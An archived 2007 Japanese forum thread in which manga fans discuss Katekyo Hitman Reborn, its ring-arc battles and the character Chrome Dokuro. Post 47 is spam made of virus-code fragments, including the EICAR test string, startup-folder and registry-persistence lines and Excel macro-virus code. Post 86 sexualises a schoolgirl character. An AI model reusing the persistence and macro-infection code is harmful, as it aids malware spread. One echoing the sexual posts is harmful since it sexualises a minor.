5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

天野明@家庭教師ヒットマンREBORN!47発目

1 :名無しさんの次レスにご期待下さい:2007/02/05(月) 23:49:50 ID:wSmgQ5640
・この作品が嫌いな人はアンチスレへどうぞ
 愛のある批判はここでOK
・荒らし、煽りはスルー推奨
・ネタバレ解禁は公式発売日(通常月曜)午前0時までが・ま・ん
 絶対にネタバレを見たくない人は木曜あたりから注意するように
・極度のキャラ萌え、801、なりきり、カップリング論は専用の板やスレへGO
・次スレは>>950が立てること。ダメなら指名すること
・愛人は四人まで

【前スレ】
天野明@家庭教師ヒットマンREBORN!46発目
http://etc6.2ch.net/test/read.cgi/wcomic/1168184477/

【まとめサイト】
ttp://www.geocities.jp/khitmanr/

【ネタバレ】
家庭教師ヒットマンREBORN!ネタバレスレ標的100
http://etc6.2ch.net/test/read.cgi/wcomic/1170577659/
【アンチスレ】
家庭教師ヒットマンREBORN アンチスレ・8
http://etc4.2ch.net/test/read.cgi/wcomic/1167642601/
【アニメ関連スレ】
家庭教師ヒットマンREBORN! 18発目来る!
http://anime2.2ch.net/test/read.cgi/anime/1170496037/
家庭教師ヒットマンREBORN!の声優について 8発目
http://anime.2ch.net/test/read.cgi/voice/1166155514/

2 :名無しさんの次レスにご期待下さい:2007/02/05(月) 23:51:39 ID:tXKOgFCu0
また2

3 :名無しさんの次レスにご期待下さい:2007/02/05(月) 23:56:50 ID:2m28BtZWO
初めての3げと!!!!!

4 :名無しさんの次レスにご期待下さい:2007/02/06(火) 00:01:42 ID:HLvPsd8H0
1乙です!

5 :名無しさんの次レスにご期待下さい:2007/02/06(火) 00:20:46 ID:Mg9t703F0
1乙

6 :名無しさんの次レスにご期待下さい:2007/02/06(火) 00:24:32 ID:ok6fRuI0O
1乙(`・ω・´)ゞ

7 :名無しさんの次レスにご期待下さい:2007/02/06(火) 00:31:56 ID:lgRbiCrG0
    ∧_∧  / ̄ ̄ ̄ ̄
  ∧( ´∀`)< あげ
 ( ⊂    ⊃ \____
 ( つ ノ ノ
 |(__)_)
 (__)_)

8 :名無しさんの次レスにご期待下さい:2007/02/06(火) 01:44:36 ID:hxqdiAKZO
山獄タッグktkr!!お互い心配してるのにめちゃくちゃ萌えた!!
一緒に戦うのが楽しみで仕方ない
スクの復活&ザン様自慢もごちそう様でした
ツナも毎週毎週かっこいいな

9 :名無しさんの次レスにご期待下さい:2007/02/06(火) 01:50:53 ID:RXlb+a2K0
 ,、_,、
 l ゚(・)゚l クマ−!
 lづ/)
 .l/),,)

10 :名無しさんの次レスにご期待下さい:2007/02/06(火) 05:50:13 ID:q6QyxYOoO
ロン毛キター!!
しかし、誰もが生きてんだろと思ってたのは仕方ない展開にしても復活早過ぎだー。

クローム吊しは痛々しい。
エロスも良いけどもあの娘内臓無いんだしさっさと誰でもいいから助けてやってくれー!!

ツナヨシも頑張れ。

11 :名無しさんの次レスにご期待下さい:2007/02/06(火) 12:13:16 ID:A9JQw0qpO
このままアンチ髑髏の声が高まれば、色々あって骸完全復活→凪回復して一般人化→漫画内からフェードアウト
ってのはありうるかもな。天野にはロンシャン黒歴史化という前例もあるし

なんというか、髑髏に対して熱心な抗議レターとか送られそうなイメージがあるんだよな……

12 :名無しさんの次レスにご期待下さい:2007/02/06(火) 12:28:21 ID:iyOKP/Ie0
骸完全復活はちょっとな……
いくらキャラ漫画とはいえご都合展開過ぎだろ

13 :名無しさんの次レスにご期待下さい:2007/02/06(火) 12:29:56 ID:ermGU8cn0
2chで腐にアンチされてる女キャラなんていっぱいいるじゃん
真に受けすぎ

14 :名無しさんの次レスにご期待下さい:2007/02/06(火) 12:49:15 ID:ySb7pqE90
そうなったら相当萎える

15 :名無しさんの次レスにご期待下さい:2007/02/06(火) 13:02:44 ID:YVva70E4O
黒曜出なくてよかった
骸も凪も不評で犬と柿は意味ない

16 :名無しさんの次レスにご期待下さい:2007/02/06(火) 13:22:40 ID:9C0l+pm+O
1000:名無しさんの次レスにご期待下さい :2007/02/06(火) 11:32:27 ID:91QN1Wrb0 [sage]
1000なら度肝を抜く神展開でリング編終了


本当にそうなってほしいな・・・・・・。

17 :名無しさんの次レスにご期待下さい:2007/02/06(火) 13:31:42 ID:qLWv1BcT0
近くの知り合いより、遠くの凪を助けないと、マーモンの幻術には勝てないので不利
と言う考えは思いつかんよな、流石に…

交渉したり、その場で敵の不意をつくのは出来たのにな(山本限定)

18 :名無しさんの次レスにご期待下さい:2007/02/06(火) 13:38:27 ID:FigtFpWq0
山本より先に回復した獄寺がまず体育館行けば良かったんじゃねーのか
まぁそれでもベルが他の誰かを人質にとる展開にはなりそうだが


19 :名無しさんの次レスにご期待下さい:2007/02/06(火) 13:51:01 ID:fUHt7ZHGO
ていうかクロームさ、手使えないんなら足使えばよくね?
流石のベルでも金玉蹴られれば凄いダメージ受けると思うぞ

20 :名無しさんの次レスにご期待下さい:2007/02/06(火) 13:52:43 ID:5bnQ6QOh0
けられてピョンピョン跳ねて痛がるベルと
それみて大笑いのクロームとマーモン?

21 :名無しさんの次レスにご期待下さい:2007/02/06(火) 14:24:54 ID:5MlFG1gjO
前スレ997-998ワロスw

22 :名無しさんの次レスにご期待下さい:2007/02/06(火) 14:44:45 ID:RUnGitQp0
この漫画久しぶりに見たが眼帯少女に眼帯少年、包帯ぐるぐる巻き少年、
体中に傷だらけみたいな痣?のある少年
作者は真性のSだな

気に入った

23 :名無しさんの次レスにご期待下さい:2007/02/06(火) 14:48:39 ID:GsqyEJwk0
>>22 >体中に傷だらけみたいな痣?のある少年

ザンザスの事か?
ザンザスは少年じゃないぞ

24 :名無しさんの次レスにご期待下さい:2007/02/06(火) 14:54:17 ID:ktyNiXhyO
というか髑髏アンチが必死過ぎてワロス
腐こええww

25 :名無しさんの次レスにご期待下さい:2007/02/06(火) 15:02:51 ID:5MlFG1gjO
>>18
野郎の宙吊り人質なんてイラネ

26 :名無しさんの次レスにご期待下さい:2007/02/06(火) 15:11:36 ID:fUHt7ZHGO
>>22
じゃあキャラ達を毎回惨殺する冨樫はSとか超越しちゃってんね

27 :名無しさんの次レスにご期待下さい:2007/02/06(火) 15:13:02 ID:EsBwRt5bO
>>22

体中に包帯って誰だ?獄寺?山本?

28 :名無しさんの次レスにご期待下さい:2007/02/06(火) 15:34:16 ID:aowJpo8S0
今回ならスクアーロじゃん
天野はSで冨樫は猟奇

29 :名無しさんの次レスにご期待下さい:2007/02/06(火) 15:49:04 ID:Fw+LcMf80
>>27
文章混ざってるぞwww
「包帯ぐるぐる巻き少年」と「体中に傷だらけみたいな痣?のある少年」な
スクアーロとザンザスのことか?でも少年じゃな(ry


30 :名無しさんの次レスにご期待下さい:2007/02/06(火) 16:05:35 ID:ZxM3NQ220
髑髏いらないよ
なにあのエロ要因
ああいうのは獄寺がやればいいw

31 :名無しさんの次レスにご期待下さい:2007/02/06(火) 16:21:55 ID:8w5io3+S0
髑髏とベルのとこはベタすぎて萎えるな
一昔前の展開すぎて
ヴァリアー小物すぎる

早く指輪編おわれ

32 :名無しさんの次レスにご期待下さい:2007/02/06(火) 16:44:26 ID:ktyNiXhyO
腐きも

33 :名無しさんの次レスにご期待下さい:2007/02/06(火) 17:10:35 ID:/DcnFr4eO
凪抜きだとマーモンに勝てるのは20年後ランボしかいないと思ふ

34 :名無しさんの次レスにご期待下さい:2007/02/06(火) 17:12:14 ID:aowJpo8S0
獄寺がボムを沢山のマーモン全部に当てたら勝てないか?

35 :名無しさんの次レスにご期待下さい:2007/02/06(火) 17:18:43 ID:5bnQ6QOh0
ヤム寺にそんな才能はない

36 :名無しさんの次レスにご期待下さい:2007/02/06(火) 17:44:22 ID:eNJ5/DOAO
獄寺せっかく武器が中距離支援なんだから
近距離の山本を援護すればいいのに

37 :名無しさんの次レスにご期待下さい:2007/02/06(火) 17:44:33 ID:IBFtOpkq0
髑髏使えない、獄寺と山本が助けた順番が悪いと言うより、
いちばん戦力になるマーモンの所に行き、髑髏を人質に取り、
交換条件を出した暗殺集団ヴァリアーベルの作戦勝ち



…の割にセコくね?

38 :名無しさんの次レスにご期待下さい:2007/02/06(火) 17:48:36 ID:Mg9t703F0
雲戦当日の朝、ツナやその他が病院を訪れたとき
ディーノがスクアーロを隠したのはなんでなんだぜ?
漫画的な理由(死んだことにして引っぱった方が面白いからとか)じゃなくて
ディーノ自身の行動理由を知りたいんだぜ?

39 :名無しさんの次レスにご期待下さい:2007/02/06(火) 18:12:38 ID:J5T/IzOY0
ジャンプ手元にないからうろ覚えだけどどっか別の施設で治療云々言ってなかったっけ?

間違ってたらスマン

40 :名無しさんの次レスにご期待下さい:2007/02/06(火) 18:12:59 ID:gDoFEutD0
わかっておりました

41 :名無しさんの次レスにご期待下さい:2007/02/06(火) 19:00:07 ID:UE6xmbJ40
指輪編最後がこうなることなどわかっておりました

42 :名無しさんの次レスにご期待下さい:2007/02/06(火) 19:27:02 ID:QEuB0vRv0
指輪編最後がグダグダになることなどわかっておりました

43 :名無しさんの次レスにご期待下さい:2007/02/06(火) 19:36:19 ID:qE1tb7oW0
守護者設定に後々苦しめられることなどわかっておりました

44 :名無しさんの次レスにご期待下さい:2007/02/06(火) 19:40:25 ID:22OEi5ZU0
クローム髑髏がエロス要員なことなどわかっておりました

45 :名無しさんの次レスにご期待下さい:2007/02/06(火) 20:10:29 ID:vfr9Lde30
今の髑髏よりも初登場時の方が小悪魔系エロで好みだったんだけど
あれ骸入ってたんだよな多分……

46 :名無しさんの次レスにご期待下さい:2007/02/06(火) 20:27:02 ID:xu5Vrgfk0
あの雲雀が山本にすんなりリングを預けたのがらしくないな

47 :名無しさんの次レスにご期待下さい:2007/02/06(火) 20:49:58 ID:t9RzVoRu0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


48 :名無しさんの次レスにご期待下さい:2007/02/06(火) 21:28:35 ID:9C0l+pm+O
>>46
やっぱ借りでもつくろうとしてるのかな。
その借りをどうするかさっぱり想像がつかんが。


49 :名無しさんの次レスにご期待下さい:2007/02/06(火) 21:57:03 ID:om8QBams0
そこまで考えて動くキャラじゃないだろう

50 :名無しさんの次レスにご期待下さい:2007/02/06(火) 22:01:10 ID:s6cIONqb0
ようやく出てきた上、実は重要な地位にいた主人公の父が
ちっともいい所を見せないって珍しい漫画だな。9代目の弱々しさにも驚いたが

51 :名無しさんの次レスにご期待下さい:2007/02/06(火) 22:14:09 ID:UE6xmbJ40
まるでDQNケンタロウ

52 :名無しさんの次レスにご期待下さい:2007/02/06(火) 22:59:28 ID:ZNqzBmB/0
>>19
象すら歩行困難になる毒を喰らって金的しろというのも酷な話
雲雀が以上なだけで

53 :名無しさんの次レスにご期待下さい:2007/02/06(火) 23:13:31 ID:xWU7LsIPO
>>52
○異常
×以上

54 :名無しさんの次レスにご期待下さい:2007/02/06(火) 23:29:21 ID:2aV1yHwtO
>>51
サモナイ4か?

55 :名無しさんの次レスにご期待下さい:2007/02/07(水) 00:20:39 ID:b79Fq7YF0
体育館の今後の予想

ベルが張ったワイヤーに引っかかりマーモンあぼん
骸出てくるも、吊るされたままで動けず→仕方ないので金的

56 :名無しさんの次レスにご期待下さい:2007/02/07(水) 00:37:13 ID:Blx+99KAO
髑髏
今度は誰に助けてもらうんですか?
黒曜ならともかく主人公たちとは守護者という肩書き以外に繋がりないのに
骸様のお役に立てなかったと泣いていたくせにその反省もしないまま恩人を増やしてどうするんだ
設定だけは嫌いじゃないんだけど設定倒れしてると思う
健気な子というより学習能力と空気を読む力がない子に思える

57 :名無しさんの次レスにご期待下さい:2007/02/07(水) 00:46:31 ID:b79Fq7YF0
ベルとマーモンの作戦勝ちなだけで、髑髏に落ち度は特に無いと思うけどな
知り合いや近場優先して、マーモンの戦闘能力を考えなかった
獄寺と山本も迂闊っちゃ迂闊だったし

58 :名無しさんの次レスにご期待下さい:2007/02/07(水) 00:58:38 ID:jgx83jVp0
山本も獄寺もヒバリに助けられてランボ、了平は獄寺に助けられた
髑髏が誰かに助けられて何が悪いのかさっぱりだ

59 :名無しさんの次レスにご期待下さい:2007/02/07(水) 00:58:40 ID:fteQjLJs0
いや、そこは獄寺と雲雀じゃないのか

60 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:04:22 ID:LTYzX+uNO
登場してから何一つバトル要員として果たしてないのはちょっとなー
頑張りをもっと見せてほしい

61 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:14:44 ID:tt3zlyJh0
髑髏の存在意義=単なる骸の器
戦闘要員でもなんでもない

62 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:20:13 ID:kpAIDaERO
ここにきて「骸さまは誰かに話しかけてるみたい」フラグの登場ですよ。
また骸が乗り移るんだろ。

63 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:22:30 ID:0iexkuVuO
雲雀が自力で動かなきゃ獄寺も山本も野垂れ死んでたのに、救出が遅れて捕まった髑髏を責めるのは筋違いだろ

今回の大空戦で最も非があるのはツナ、守護者放っとき杉

64 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:22:35 ID:fNPfowN00
髑髏=凪は骸が復讐者に捕まった後に精神世界?で出会ったんだっけ?
骸が捕まってからまだそれほど経ってないよな。よくて数ヶ月くらいか。
事故で死にかけたのも含めてあれくらい動ければ十分だと思うが。
素質はあったにせよもともとはごく普通の女の子だったんだろうし。

65 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:26:10 ID:o7rtJhoWO
戦闘要員として期待してる奴がいることに驚き

66 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:44:16 ID:6wDPnVIgO
ツナが対ザンザスに集中してるのはリボーンからの指示。
つーかどっちの大空も守護者たちが独自で戦ってるの知ってるんだから、互いの戦いに専念した方が良いだろ

67 :名無しさんの次レスにご期待下さい:2007/02/07(水) 01:55:21 ID:tt3zlyJh0
リボーンの指示でザンザスを倒すことに集中してたけど
倒すことができないまま30分のタイムリミットが近づき
先に守護者を助けに行くべきか迷う・・・みたいな展開だったら
大空戦にもちょっとは緊迫感が出たと思うんだけどな。

68 :名無しさんの次レスにご期待下さい:2007/02/07(水) 02:10:59 ID:o7rtJhoWO
結局大空戦は大空戦、守護者は守護者になっててリミットつけても相互性がないし
守護者達は同じ枠内で何回戦ってんだよって感じだし…

69 :名無しさんの次レスにご期待下さい:2007/02/07(水) 02:12:45 ID:sxQMW3qi0
いくら情が薄いとはいえ女の子を先に助けないと

70 :名無しさんの次レスにご期待下さい:2007/02/07(水) 02:18:37 ID:qgFIyQtN0
でも、敵の守護者が復活したフィールドに最優先で駆けつけるのは仕方ないよ
たまたまベルは獄寺を放置したが、レヴィみたいにさっくり殺そうとしても不思議じゃない
1番味方が危険な状況じゃないか

だから嵐と雷のフィールド優先というのは納得できた
後の順番は知らんが

71 :名無しさんの次レスにご期待下さい:2007/02/07(水) 02:40:04 ID:ea9OJxiP0
髑髏叩いてる奴は女だな

72 :名無しさんの次レスにご期待下さい:2007/02/07(水) 02:52:23 ID:g/AZ43E4O
パンツみたい

73 :名無しさんの次レスにご期待下さい:2007/02/07(水) 05:10:04 ID:YMUhiPdYO
まぁ…なんだ。様はストーリーが面白ければ誰が活躍したって構わないんだが
如何せん大空戦がつまらないんだよな。今までのオマケにすら感じる

74 :名無しさんの次レスにご期待下さい:2007/02/07(水) 08:53:30 ID:3XF8Ri+DO
凪が弱いのは不満あるかもしれんが
どのキャラにしろ仕方ないことにケチつけるやつは
そのキャラを叩こうと思って読んでるようにしか見えん

つか俺が住んでるとこリアルジャパニーズマフィアが抗争中だぜ\(^o^)/

75 :名無しさんの次レスにご期待下さい:2007/02/07(水) 10:26:24 ID:ANoF+FA50
渋谷か?乙
流れ弾に気をつけろよ
リボーンも指輪編終わったら泥沼抗争やればいい
公道で馬車レースとか

76 :名無しさんの次レスにご期待下さい:2007/02/07(水) 10:53:02 ID:IXsxQZx+O
仕方ない状況とはいえ登場したばかりの女の子が何度もピンチに陥ってると
「またかよ」と思う気持ちは分からないでもない
まあ凪自身がどうのこうのという問題じゃなくて作者の見せ方なんだけど

77 :名無しさんの次レスにご期待下さい:2007/02/07(水) 10:56:20 ID:ANoF+FA50
一辺に強くならんでもいい
努力してるところと少しずつの成果が見られればそれでも充分だ

78 :名無しさんの次レスにご期待下さい:2007/02/07(水) 11:04:22 ID:ES5bP9sY0
凪がピンチにならないと骸が出て来ないからなー

79 :名無しさんの次レスにご期待下さい:2007/02/07(水) 11:32:33 ID:wfdeHFTO0
>>70
敵→2人復活
味方→1人だけ自力復活

で、雲雀の身体は1つしかないから、雷か嵐かどっちを優先するかという選択だね。
しかし雷のフィールドに駆けつけて、もともと重体のランボを助けたとしても、やっぱり動けるのは雲雀だけ。
ここは子供を後回しにしても、獄寺を助けて動ける面子を増やす戦略で正しかった。

雲雀が次に向かったのが雨のフィールドというのも、ベルは「ここからは雨が近いか」と言っていたのを
聞いた上での判断なら、やはり無理ない。

つーことで、「なんで女の子を早く助けないんだ!?」という苦情で責められるのは、ランボ救出後のヤム寺についてだけじゃないか?

80 :名無しさんの次レスにご期待下さい:2007/02/07(水) 11:33:43 ID:ES5bP9sY0
ヌッチャケ、獄寺も山本も髑髏の事は忘れてたぽくね?

81 :名無しさんの次レスにご期待下さい:2007/02/07(水) 12:44:32 ID:3XF8Ri+DO
>>75
銃声はまじで聞いた、髪も黒くしたし、服も地味にした
近々入試の監視で大学かりだされるが、俺の大学は某一族御用達だから大丈夫だ

俺は\(;o;)/イキル

82 :名無しさんの次レスにご期待下さい:2007/02/07(水) 13:14:58 ID:IXsxQZx+O
>>80
出会って間もないし絆が深まるようなこともしてないしね
ヤム寺や雲雀にとっちゃ髑髏より骸のイメージのほうが強いかもしれないし

83 :名無しさんの次レスにご期待下さい:2007/02/07(水) 13:52:48 ID:MAOr62RO0
>>81
ガンバレ

84 :名無しさんの次レスにご期待下さい:2007/02/07(水) 13:54:05 ID:y00dfNtLO
ザンザスは歴代ボス全ての技が使えると思ってたぜ

85 :名無しさんの次レスにご期待下さい:2007/02/07(水) 14:06:14 ID:kS5n1h2a0
>>82
髑髏は守護者全員に挨拶のキスをすればよかったのにね

86 :名無しさんの次レスにご期待下さい:2007/02/07(水) 14:35:19 ID:61ZQZH0/O
ところで凪のあの状態ってかなりヤバイよな
獄寺と山本が駆けつけるまで、武器を奪われて両手縛って吊されたまま
ベルとマーモンの幻術であんなことやそんなことをされてる凪を
妄想して抜いた

87 :名無しさんの次レスにご期待下さい:2007/02/07(水) 14:48:51 ID:YvyFnvGh0
マーモンの位置からパンツ丸見えだろ

88 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:05:29 ID:nBNwB6L10
俺らもしょっちゅう晴の守護者忘れてるじゃん
一緒一緒´∀`

89 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:21:26 ID:1AKmHppE0
海外のリボーンレビューサイトに
The action just kicks ass.ってあったんだけど
これってつまりリボーンのアクションは見るに耐えないってことか?

90 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:29:43 ID:Sc0dUWTVO
>>86

どっかのエロ同人誌でやりそう。

天野、ネタ提供してんじゃんw

91 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:43:09 ID:YvyFnvGh0
どっかのブログでまさにそんなエロ絵を描いてたな

92 :名無しさんの次レスにご期待下さい:2007/02/07(水) 15:55:09 ID:eZ1bMS1m0
>>81
なぜかあなただけ見つめてるを思い出した

93 :名無しさんの次レスにご期待下さい:2007/02/07(水) 16:06:31 ID:61ZQZH0/O
>>92
今マックでお前のレス見てチーズバーガー吹いたw

94 :名無しさんの次レスにご期待下さい:2007/02/07(水) 16:45:45 ID:X4ciKvAQ0
>>93がマックでチーズバーガー吹いてるところ想像してよっちゃんイカ吹いたww

95 :名無しさんの次レスにご期待下さい:2007/02/07(水) 16:59:44 ID:3XF8Ri+DO
エロネタはやめてくれ

96 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:00:30 ID:MAOr62RO0
>>91
髑髏スレにあるよ

97 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:04:23 ID:78Mr90Ea0
>>92
俺もwwwww

98 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:12:25 ID:4sUoQCCR0
髑髏に萌えたんなら素直にキャラスレ行ったほうがいい
荒れるみたいだから

99 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:38:48 ID:o7rtJhoWO
どのキャラでも荒れるよ

100 :名無しさんの次レスにご期待下さい:2007/02/07(水) 17:53:08 ID:CgHJkMQN0
>>89
the action kicks ass って、このアクション超かっこいい〜って意味だよ。

101 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:28:15 ID:78Mr90Ea0
今更なんだが
髑髏がツナにキスしたエピソードは展開上なんか意味があったのか?

102 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:31:31 ID:pYz83zba0
髑髏は骸(変態)の女体化だと混乱する読者への追い討ち

103 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:33:24 ID:ANoF+FA50
赤丸の番外編と合わせて凪が間違ったイタリア認識しているという伏線

104 :名無しさんの次レスにご期待下さい:2007/02/07(水) 20:38:38 ID:YvyFnvGh0
髑髏は生粋のオナニスト

105 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:01:07 ID:MJi3kUy+0
とりあえずツナの愛人候補という名の設立

わ た し も 仲 間 に い れ て(凪、心の声

106 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:10:30 ID:jgx83jVp0
髑髏はいつかツナをあの三叉矛で刺す使命が有ると妄想

107 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:11:30 ID:O6oNZMA3O
多分>>103のいうように間違ったイタリア文化を認識しているのでは?

108 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:16:43 ID:ANoF+FA50
でもよく考えたら別に間違ってないよな
挨拶にキスは普通だ

109 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:16:43 ID:pYz83zba0
「欧米か!」のツッコミが欲しかった

110 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:17:09 ID:C8vKD7Fb0
でも、初対面では普通しない

111 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:22:27 ID:jgx83jVp0
骸にしろって言われてたんじゃないのかな面白がりそうだし
あとお礼のキスは欧米ではよくある
ありがとボスって言ってキスしてたし

112 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:23:34 ID:78Mr90Ea0
女からもするのか?

113 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:24:14 ID:ANoF+FA50
しろって言われたというか、間違ったイタリア文化を面白がって教えられてそうではあるな

114 :名無しさんの次レスにご期待下さい:2007/02/07(水) 21:49:46 ID:76b+an/80
家光とバジルみたいなもんか

115 :名無しさんの次レスにご期待下さい:2007/02/07(水) 22:05:22 ID:KrU0lcdm0
髑髏「ボスありがと」チュッ
ツナ「欧米か!」

のツッコミを期待していた凪か

116 :名無しさんの次レスにご期待下さい:2007/02/07(水) 22:11:12 ID:YvyFnvGh0
欧米だからってキスキスキスするわけじゃないと思う

117 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:15:15 ID:1RCI+NXz0
エアーキスだよな、普通は。

118 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:15:51 ID:C02d+u1f0
お礼でキスは結構親しくならないとだめだよ
セクハラで訴えられるよ

119 :名無しさんの次レスにご期待下さい:2007/02/07(水) 23:19:39 ID:78Mr90Ea0
普通にキスキスするの骸はそれが普通だったとかか…

120 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:10:26 ID:JoBlf0La0
犬→髑髏にラブの伏線

しかしこの片思いにはメリットが感じられない

121 :名無しさんの次レスにご期待下さい:2007/02/08(木) 01:33:11 ID:EQVv86kg0
おばかで空回りな犬→腐女子喜ぶ
たまに骸が髑髏になりきって犬をからかう→腐(ry

122 :名無しさんの次レスにご期待下さい:2007/02/08(木) 02:18:38 ID:67GAS6jZ0
女子供に用は無い

123 :名無しさんの次レスにご期待下さい:2007/02/08(木) 03:00:15 ID:AMxbYMqNO
文化の違いというよりも、主人公こんな可愛娘ちゃんにチューされちゃってな羨まし状態。


女視線から見てもリボーンの女性キャラ可愛いけどな。
最近ビアンキ出なくて寂しい。

124 :名無しさんの次レスにご期待下さい:2007/02/08(木) 04:35:09 ID:UPUOm+TY0
赤丸ポスター?のチビキャラビアンキとMMかわいかった
今後本編にあんな関係で登場するのを期待してたんだが…

125 :名無しさんの次レスにご期待下さい:2007/02/08(木) 06:23:25 ID:Y9YLeQTe0
>>115
ココア吹いたw

そんなキレキレ日常編が恋しい

126 :名無しさんの次レスにご期待下さい:2007/02/08(木) 06:38:25 ID:pDdfAXjyO
シリアスにも疲れてきたので早くドタバタ日常編に戻ってくれ

もう
http://anime2.2ch.net/test/read.cgi/csaloon/1160575615/441-442
でも許すから

127 :名無しさんの次レスにご期待下さい:2007/02/08(木) 14:32:33 ID:uy/yFZaZ0
此処も髑髏の話題ばっかだなw
人質に取られたのは救出が最後になったせいであって、それについて叩くのは
間違ってるが、如何せん見せ方があれだとそりゃ腐じゃなくても叩きたくなるわな
この場合天野に問題がある
あ、言っとくけど髑髏アンチでも天野アンチでもない

128 :名無しさんの次レスにご期待下さい:2007/02/08(木) 16:39:44 ID:mK2rX1xIO
ヤム寺、頼むから氏んでおくれやす

129 :名無しさんの次レスにご期待下さい:2007/02/08(木) 18:46:10 ID:qI/acWkR0
獄寺山本髑髏がマーモンを人質にして
ベルとルッスーリアが笹川兄を人質にしてもなあ

130 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:00:15 ID:Ma4YdWFzO
髑髏は男作家にありがちな、作者の都合で動かされてるヒロインに見える
バトルヒロインは普通男キャラと同格くらいの扱いなのに、今の役立たずで足手まといのままじゃ正直気の毒だな
鰤のルキアやワンピのナミも弱い弱い言われながらもそれなりに見せ場を与えられてるし

131 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:12:26 ID:Pajbe2SQ0
すぐピンチになって骸召喚、じゃワンパターンだしな
女を敵にするとか、集団戦で幻術使ったサポートとかなら活躍できそう

132 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:39:48 ID:9CkkZt79O
まだ出てきたばっかだしなぁ、あんま目くじらたてるなよ
髑髏の話題はあれるから
ここらで20年後ランボについて語ろうぜ

133 :名無しさんの次レスにご期待下さい:2007/02/08(木) 20:51:36 ID:GTprWrGD0
20年後ランボか……語りたいがあれだけの登場では話題が乏しいな

134 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:13:38 ID:0gJjvLBgO
みんなの将来予想

ランボ(アホ牛→伊達男→バッファローマン)だったから

獄寺(坊ちゃん→ダイナマイト→核ミサイル)

了平(笹川兄弟一号→極限太陽→地球割り)

山本(野球バカ→剣道かじり→キル・ビル)

あとはなんだろな

135 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:15:56 ID:AE4DeKwl0
20年後ランボかっこいいよな
でも20年後には指輪守護者とか解散してそうな気がする

136 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:35:14 ID:8eOTcqK/O
20年後っていうとみんな34、5歳か。

マフィアになってマフィアな生活を送るのか、
それとも平凡なサラリーマンやスーパーアスリートになるのかどっちだ・・・・・・。
とりあえず20年後イーピンが見たい。


137 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:48:55 ID:4i8X0tNy0
獄寺はダイナマイト→ヤム極寺
じゃないの?

138 :名無しさんの次レスにご期待下さい:2007/02/08(木) 21:54:07 ID:8jbbJ8ie0
>>136
兄山本雲雀らへんはあるいは普通に就職する道もあるかもしれんが
骸やランボはまずまっとうな人生は送れまいな 獄寺も家庭環境からしてアウトだろうし

139 :名無しさんの次レスにご期待下さい:2007/02/08(木) 22:04:06 ID:/u5w++MK0
山本は普通に野球選手やりながらマフィアごっこを続けていそうだw

>>135
20年後のランボは出番が少なかったからぼろが出なかっただけだ、本質変わったらランボじゃねーw

29 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)